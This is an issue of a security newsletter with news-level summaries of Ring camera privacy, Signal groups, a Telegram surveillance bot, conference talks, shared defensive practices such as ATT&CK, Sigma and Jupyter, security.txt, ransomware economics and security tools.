[tl;dr sec] #18 - \"GitHubification\" of Infosec, Ring Privacy, Ransomware Economics
Blue teams can become highly leveraged by sharing knowledge effectively, Ring's partnerships with the police, viewing ransomware through an economic lens.
This week I’m working remotely from the Midwest, visiting my family for the holidays. There’s this weird fluffy white stuff on the ground- still trying to figure out what it is 🤔
But really, I remember when I first moved to California, and saw people wearing their warmest winter coats when it was 55 degrees out; meanwhile, I was wearing a sweatshirt and thinking how nice the weather was. I felt like I had super powers! Now I’m the same, sigh.
Moved to tldrsec.com
You may have noticed that our blog has moved from programanalys.is to tldrsec.com. It turns out that’s easier to tell people than, “So it’s ‘program analysis’ but the .is is the domain. Wait, no, the period is there. Oh, you’ve almost got it but…”
🎄 Break for the Holidays
As next week is Christmas and the following is New Years, I probably won’t be sending out another tl;dr sec for 1-2 weeks. Happy holidays! I hope you have some time to relax with your loved ones and eat some good food.
📜 In this newsletter...
Privacy: Ring's partnerships with the police, livestreamed podcast of hacked Rings, Signal groups, Telegram surveillance bot
Talks: BlackHat USA 2019 talks posted, Malware Unicorn's BlackHat EU keynote, extending Ghidra, deobfuscating an Android botnet
Githubification of InfoSec: Blue teams can become highly leveraged by sharing knowledge via things like the MITRE ATT&CK™ framework, detection definitions in Sigma rules, and repeatable analyses written in Jupyter notebooks
Misc: security.txt progresses, legal docs for physical pen tests, example CISO application slide deck
Ransomware: Towards an Economic Equilibrium: on the economics of ransomware and its similarities to kidnapping
Tools: Facebook's Python static analysis tool finds its first CVE, an IPython notebook to explore ZAP's API and scripting functions, omnibot - a Slack proxy and bot framework
The article hypothesizes that Amazon may have bought Ring to help reduce package theft (which cuts into margins) and because of its existing relationships with law enforcement.
Inside the Podcast that Hacks Ring Camera Owners Live on Air
“The NulledCast is a podcast livestreamed to Discord. It’s a show in which hackers take over people’s Ring and Nest smarthome cameras and use their speakers to talk to and harass their unsuspecting owners.” It’s not really hacking, it’s just using software that can use previously compromised email addresses and passwords to break into Ring cameras at scale.
Technology Preview: Signal Private Group System
An interesting discussion of the technical challenges in implementing groups in Signal in a way that maintains various strong privacy guarantees.
Informer: A Telegram Mass Surveillance Bot in Python
A bot library that allows you to masquerade as multiple real users on Telegram and spy on 500+ Telegram channels per account. Details are logged to a MySQL database, a private Google Sheet and your own private channel for analysis.
One cool thing about working at NCC Group is being able to work with colleagues who are world-class in specific areas, like cryptography. When I asked them which secure messaging app best respects my privacy / has the most desirable cryptographic properties, they’ve generally given me the unanimous answer: Signal.
The BlackHat USA 2019 videos have been posted.
Blue to Red: Traversing the Spectrum
BlackHat EU 2019 keynote by Malware Unicorn. She describes how security fundamentals have been critical to her career success, from being a forensic technician in government, to a malware researcher in the private sector, and currently as an offensive engineer on the red team at Facebook.
A talk from an 8+ year Ghidra developer on extending Ghidra with scripts and plugins.
By John Lambert, Distinguished Engineer, Microsoft Threat Intelligence Center.
“A community-based approach in infosec can speed learning for defenders. Attack knowledge curated in the MITRE ATT&CK™ framework, detection definitions expressed in Sigma rules, and repeatable analysis written in Jupyter notebooks form a stackable set of practices. They connect knowledge to analytics to analysis.
If organizations were to contribute and share their unique expertise using these frameworks, and organizations were in this way to build on the expertise of others, defenders in every organization would benefit from the best defense in any organization.”
The MITRE ATT&CK™ framework gives us a curated taxonomy of attack tactics and techniques used in the wild.
“Various threat actors are described by the ATT&CK techniques they use. Defenders can then evaluate their defensive controls against the subset of techniques used by the specific threat actors they face.”
Sigma (source code) provides a generic, vendor-agnostic way to write detections on logs. It comes with a set of converters that translates the Sigma language into popular query tools including Splunk, Elastic Search, QRadar, and others (uncoder.io can be used to do this easily).
Researchers and people writing security advisories can share Sigma rules to self-document concrete logic for detecting attacker techniques.
Jupyter notebooks can be shared that make investigation processes repeatable and document how relevant data was enriched.
“When someone else downloads a notebook, they can follow along on the analysis, or they can apply the methodology to their data by re-running it. This ability to execute the analysis against similar data is a powerful concept that allows one to encapsulate expertise. Now any publisher of a notebook is not only a teacher, but also a virtual team member.”
Relatedly, in tl;dr sec #11 we saw Twilio release SOCless, their serverless framework for running SecOps runbooks at scale, and Dropbox discussed their automation around threat detection and IR built on Jupyter notebooks.
Roberto Rodriguez has a blog series on using Jupyter notebooks for threat hunting, here’s a blog post on using the ThreatHunterPlaybook Project + Mordor (pre-recorded security event datasets), and Netscylla also has a blog that walks through one of the author’s notebooks for use in an incident response scenario.
security.txt is making its way through IETF
“When security vulnerabilities are discovered by independent security researchers, they often lack the channels to report them properly. As a result, security vulnerabilities may be left unreported. This document defines a format (“security.txt”) to help organizations describe the process for security researchers to follow in order to report security vulnerabilities.” (full text of spec)
TrustedSec released their legal documentation for physical security assessments. I think this is awesome, and will hopefully help prevent future cases like the two Coalfire employees who were hit with felony burglary accusations for testing the Iowa State Judicial Branch, which they were hired to do.
Blog post by Kelly Shortridge on “how the economics of physical ransom translate to digital ransom, and how we as an industry might want to reconceive our current approaches to considering and dealing with ransomware – and the criminals who run ransomware campaigns.”
In short, kidnappers, pirates, and ransomware authors want the situation to “go well” for the victim, because if they get a reputation for bad outcomes, people won’t pay.
Since these sorts of illegal activity are inevitable, we want to have “good” attackers, who do not kill their victims and who allow safe recovery of data.
Kidnapping insurance and cyber insurance help incentivize skilled attackers who keep their promises.
Pysa, the Python static analysis tool by Facebook, found its first CVE, an open redirect in the thumbnail view of Zulip, an open source team chat application. Pysa’s docs have also been updated with more info on increasing its coverage.
(Lyft) Announcing omnibot: a Slack proxy and Slack bot framework
Over time, Slack has added a number of APIs for writing integrations. Depending on what functionality you want (e.g. slash commands, interactive components), you may have to use different sets of APIs, which can cause you to have to mostly rewrite a bot if you made the wrong choice when you started.
✉️ Wrapping Up
Have questions, comments, or feedback? Just reply directly, I'd love to hear from you.
If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏
Thanks for reading!